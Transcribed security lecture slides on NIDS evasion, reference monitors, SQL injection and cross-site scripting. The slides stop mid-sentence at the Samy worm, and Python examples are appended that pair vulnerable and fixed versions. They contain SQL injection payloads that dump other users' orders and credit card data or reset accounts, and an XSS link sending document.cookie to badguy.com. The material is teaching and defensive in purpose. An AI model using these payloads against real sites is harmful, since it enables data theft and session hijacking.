Slide 1: Web Security
Dawn Song, dawnsong@cs.berkeley.edu
Some slides from John Mitchell

Slide 2: NIDS Evasion: Normalization Problems
- Complete fragment reassembly is necessary to detect certain attacks
- The NIDS only has partial knowledge of what traffic the host sees (e.g., TTL expires, MTU)
- Ambiguities in TCP/IP (e.g., overlapping IP/TCP fragments); different OSes implement the standard differently

Slide 3: Small TTL Attack
- Attacker's data stream: A T T I A C K
- "I" has the same TCP sequence number as the following "A" but a short TTL
- NIDS sees: A T T I A C K
- End host sees: A T T A C K (the "I" segment's TTL expires before it reaches the host)

Slide 4: Fragmentation Overlap Attack
- Attacker's data stream: A T T A I C K
- "I" and "C" have the same TCP sequence number (or the same IP fragment offset)
- NIDS sees: A T T A I C K
- End host sees: A T T A C K (its reassembly resolves the overlap in favour of "C")

Slide 5: Solution: Traffic Normalizer
- Introduce a "bump in the wire" traffic normalizer that removes protocol ambiguities before traffic reaches the host:
  - Drop overlapping IP/TCP fragments
  - Increase the TTL in packets with a low TTL
- Placement: between the Internet and the host, alongside the NIDS
- Other approaches: host-based IDS; a detailed intranet map

Slide 6: Stealth Port Scanning
- The IP id field can be used for stealth port scanning

Slide 7: Principle: Reference Monitor
- SFI, system call interposition, VMM introspection, firewalls, NIDS: all have one thing in common
- One enforcement mechanism: the reference monitor
- Examines every request to access any controlled resource (an object) and determines whether to allow the request
- Subject --(request)--> Reference Monitor --> Object

Slide 8: Reference Monitor Security Properties
- Always invoked (complete mediation property): all security-relevant operations must be mediated by the RM; the RM should be invoked on every operation controlled by the access control policy
- Tamper resistant: maintain RM integrity (no tampering with its code or state)
- Verifiable: one can verify RM correctness, i.e., that it correctly enforces the desired access control policy; this requires an extremely simple RM, since correctness can't be verified for systems with any appreciable degree of complexity

Slide 9: Web Security
- The web is a new platform for many security-critical applications (e.g., banking, e-commerce)
- Web security is complex and constantly evolving
- A two-sided story:
  - Web application code: runs at the web site on a web server or app server; written in PHP, ASP, JSP, Ruby, ...; question: secure web site design
  - Web browser (next lecture): can be attacked by any website it visits; attacks result in computer compromise, malware installation, etc.; question: secure web browser

Slide 10: Secure Web Site Design
- Today's web is dynamic
- Complex web applications: run on a web server or app server; take input from web users via the web server; interact with databases and 3rd parties; prepare results for users via the web server
- Examples: shopping carts, online banking, bill pay, tax prep, etc.
- Challenges: new code is written for every web site, often with little security consideration; many potential vulnerabilities

Slide 11: Common Vulnerabilities
- Input validation: SQL injection; XSS (cross-site scripting); HTTP response splitting
- Cookie management: CSRF (cross-site request forgery)

Slide 12: SQL Injection

Slide 13: Dynamic Web Application
- Browser --GET / HTTP/1.0--> Web server (index.php) <--> Database server
- Web server --HTTP/1.1 200 OK--> Browser

Slide 14: Basic picture: SQL Injection
- 1. The attacker posts a malicious form to the victim server
- 2. The victim server sends an unintended query to the SQL DB
- 3. The attacker receives valuable data

Slide 15: What is SQL Injection?
- Input validation vulnerability: untrusted user input is placed in a SQL query to the back-end database without sanitizing the data
- A specific case of the more general command injection: inserting untrusted input into a query or command
- Why bad: the supplied data can be misinterpreted as a command, which could alter the intended effect of the command or query

Slide 16: SQL Injection Example
- Form for viewing pizza order history:
    View pizza order history<br>
    <form method="post" action=...>
      Month: <select name="month">
        <option value="1">Jan</option> ... <option value="12">Dec</option>
      </select>
      Year: ...
      <p><input type="submit" name="submit" value="View">
    </form>
- The attacker can post a form that is not generated by this page

Slide 17: SQL Injection Example
- Normal SQL query:
    SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND order_month=10
- For the order_month parameter the attacker could input: 0 OR 1=1
- Malicious query: the WHERE condition is always true, which gives the attacker access to other users' private data:
    WHERE userid=4123 AND order_month=0 OR 1=1

Slide 18: SQL Injection Example: All User Data Compromised (screenshot)

Slide 19: SQL Injection Example: A more damaging example
- For the order_month parameter the attacker could input:
    0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year FROM creditcards
- The attacker is able to combine the results of two queries: the empty table from the first query with the sensitive credit card info of all users from the second query

Slide 20: SQL Injection Example: Credit Card Info Compromised (screenshot)

Slide 21: More Attacks
- Create new users:
    INSERT INTO USERS (uname, passwd, salt) VALUES ('hacker', '38a74f', 3234)
- Password reset:
    UPDATE USERS SET email='hcker@root.org' WHERE email='victim@yahoo.com'

Slide 23: It's not a joke, it's real
- CardSystems: a credit card payment processing company; SQL injection attack in June 2005; put out of business
- The attack: 263,000 credit card numbers stolen from the database; credit card numbers were stored unencrypted; 43 million credit card numbers exposed

Slide 24: Cross-Site Scripting (XSS) Attacks

Slide 25: Basic picture: Cross-site scripting
- 1. The user (victim) visits the attacker's web site
- 2. The user receives a malicious page
- 3. The user clicks on a link to the vulnerable server's web site
- 4. The vulnerable server echoes the user input
- 5. Valuable data is sent to the attacker

Slide 26: The setup (slide credit: Dan Boneh)
- User input is echoed into the HTML response
- Example: search field: http://victim.com/search.php?term=apple
- search.php responds with:
    <HTML><TITLE>Search Results</TITLE>
    <BODY>Results for <?php echo $_GET[term] ?>: ...</BODY></HTML>
- Is this exploitable?

Slide 27: Bad input (slide credit: Dan Boneh)
- Problem: no validation of the input term
- Consider this link (properly URL encoded):
    http://victim.com/search.php?term=<script>window.open("http://badguy.com/?cookie="+document.cookie)</script>
- What if the user clicks on this link?
  1. The browser goes to victim.com/search.php
  2. victim.com returns <HTML>Results for <script>...</script>
  3. The browser executes the script and sends badguy.com the cookie for victim.com

Slide 28: So what? (slide credit: Dan Boneh)
- Why would a user click on such a link? A phishing email in a webmail client (e.g., Gmail); a link in a DoubleClick banner ad; many, many ways to fool a user into clicking
- What if badguy.com gets the cookie for victim.com? The cookie can include the session authentication for victim.com, or other data intended only for victim.com; this violates the same origin policy

Slide 29: Even worse (slide credit: Dan Boneh)
- The attacker can execute arbitrary scripts in the browser
- Can manipulate any DOM component on victim.com: control links on the page; control form fields (e.g., the password field) on this page and linked pages
- Can infect other users: the MySpace.com worm

Slide 30: MySpace.com Samy worm
- Users can post HTML on their pages
- MySpace.com ensures the HTML contains no <script>, <body onclick>, <a href
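The small TTL and fragmentation overlap evasions from slides 3 and 4, and the normalizer from slide 5, simulated as an added example (not from the lecture). It assumes one byte per segment, that the end host sits three hops beyond the NIDS, that the NIDS matches bytes in wire order, and that the host's stack keeps the newest data when sequence numbers overlap; the stream constants are constructed to match the slides.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Segment:
    seq: int    # TCP sequence number; one byte per segment keeps the streams readable
    data: str
    ttl: int

HOPS_TO_HOST = 3       # assumption: the end host is three hops beyond the NIDS
SIGNATURE = "ATTACK"   # the byte pattern the NIDS is looking for

def seg(seq, data, ttl=64):
    return Segment(seq, data, ttl)

# Slide 3 (constructed): "I" shares the sequence number of the following "A" but has TTL 1.
SMALL_TTL = [seg(0, "A"), seg(1, "T"), seg(2, "T"), seg(3, "I", ttl=1),
             seg(3, "A"), seg(4, "C"), seg(5, "K")]
# Slide 4 (constructed): "I" and "C" share a sequence number; the host keeps the later one.
OVERLAP = [seg(0, "A"), seg(1, "T"), seg(2, "T"), seg(3, "A"),
           seg(4, "I"), seg(4, "C"), seg(5, "K")]

def nids_view(segments):
    """A NIDS without full reassembly matches on the bytes in wire order."""
    return "".join(s.data for s in segments)

def host_view(segments, hops=HOPS_TO_HOST):
    """End host: segments whose TTL expires never arrive; on overlap this
    (assumed) stack keeps the newest data for a sequence number."""
    stream = {}
    for s in segments:
        if s.ttl > hops:
            stream[s.seq] = s.data
    return "".join(stream[k] for k in sorted(stream))

def normalize(segments, hops=HOPS_TO_HOST, safe_ttl=64):
    """Bump-in-the-wire normalizer: drop overlapping fragments, raise low TTLs."""
    seen, out = set(), []
    for s in segments:
        if s.seq in seen:
            continue                       # overlapping fragment: drop it
        seen.add(s.seq)
        out.append(Segment(s.seq, s.data, s.ttl if s.ttl > hops else safe_ttl))
    return out

def alert(view):
    return SIGNATURE in view

def evaded(segments):
    """True when the host assembles the attack but the NIDS raises no alert."""
    return alert(host_view(segments)) and not alert(nids_view(segments))
```

After `normalize()` the NIDS and the host assemble the same bytes for both streams, so the ambiguity the evasions rely on is gone.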
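The pizza order query from slides 17 and 19, as an added example (not the lecture's code) against an in-memory SQLite database with constructed rows: the string-spliced query the slides describe, beside a version that validates the month against an allow-list and binds it as a query parameter. Table and column names follow the slides; the row contents and card numbers are constructed.

```python
import sqlite3

def setup_db():
    """In-memory database with constructed rows shaped like the slides' tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE orders(userid INT, pizza TEXT, toppings TEXT, quantity INT,
                            order_day INT, order_month INT);
        CREATE TABLE creditcards(cardholder TEXT, number TEXT, exp_month INT, exp_year INT);
        INSERT INTO orders VALUES (4123, 'Margherita', 'basil', 1, 3, 10),
                                  (4123, 'Diavola', 'chili', 2, 7, 9),
                                  (7001, 'Quattro Formaggi', 'cheese', 1, 12, 10);
        INSERT INTO creditcards VALUES ('Alice', '4111-constructed-0001', 6, 2009),
                                       ('Bob', '4111-constructed-0002', 11, 2010);
    """)
    return db

def orders_vulnerable(db, userid, order_month):
    # The slides' query with the month spliced in as text: the injection point.
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           f"WHERE userid={userid} AND order_month={order_month}")
    return db.execute(sql).fetchall()

def validate_month(value):
    """Allow-list check: the month must be an integer 1..12, else None."""
    try:
        month = int(value)
    except (TypeError, ValueError):
        return None
    return month if 1 <= month <= 12 else None

def orders_safe(db, userid, order_month):
    # Same query, but the month is validated and bound as a parameter, so the
    # database never parses attacker-supplied text as SQL.
    month = validate_month(order_month)
    if month is None:
        return []
    sql = ("SELECT pizza, toppings, quantity, order_day FROM orders "
           "WHERE userid=? AND order_month=?")
    return db.execute(sql, (userid, month)).fetchall()

# The two inputs the slides give for the order_month parameter.
ALWAYS_TRUE = "0 OR 1=1"
UNION_CARDS = ("0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year "
               "FROM creditcards")
```

The UNION input only works because both SELECTs produce four columns, which is why the slide's payload lists exactly four credit card fields.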
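The search.php echo from slides 26 and 27, as an added example (not the lecture's code): the server side reimplemented in Python, with the verbatim echo beside an HTML-escaped version, both driven by the slide's link after it has been URL-encoded. The `serve`, `render_*` and `has_script_tag` names are this example's own.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

PAGE = "<HTML><TITLE>Search Results</TITLE><BODY>Results for {term}:</BODY></HTML>"

def render_vulnerable(term):
    # Mirrors the slides' search.php: the term is echoed into the HTML verbatim.
    return PAGE.format(term=term)

def render_safe(term):
    # HTML-encode the untrusted term so the browser treats it as text, not markup.
    return PAGE.format(term=html.escape(term, quote=True))

def serve(url, render):
    """Read ?term= the way search.php reads $_GET['term'], then render the page."""
    query = parse_qs(urlsplit(url).query)
    term = query.get("term", [""])[0]      # parse_qs already URL-decodes the value
    return render(term)

def has_script_tag(page):
    """Coarse check used here only to show which rendering lets a tag through."""
    return "<script" in page.lower()

# The slide-27 link, constructed here and URL-encoded as the slide says it is.
PAYLOAD = '<script>window.open("http://badguy.com/?cookie=" + document.cookie)</script>'
EVIL_LINK = "http://victim.com/search.php?term=" + quote(PAYLOAD, safe="")
NORMAL_LINK = "http://victim.com/search.php?term=apple"
```

For an ordinary term such as `apple` both renderings produce the same page; only the echoed markup differs.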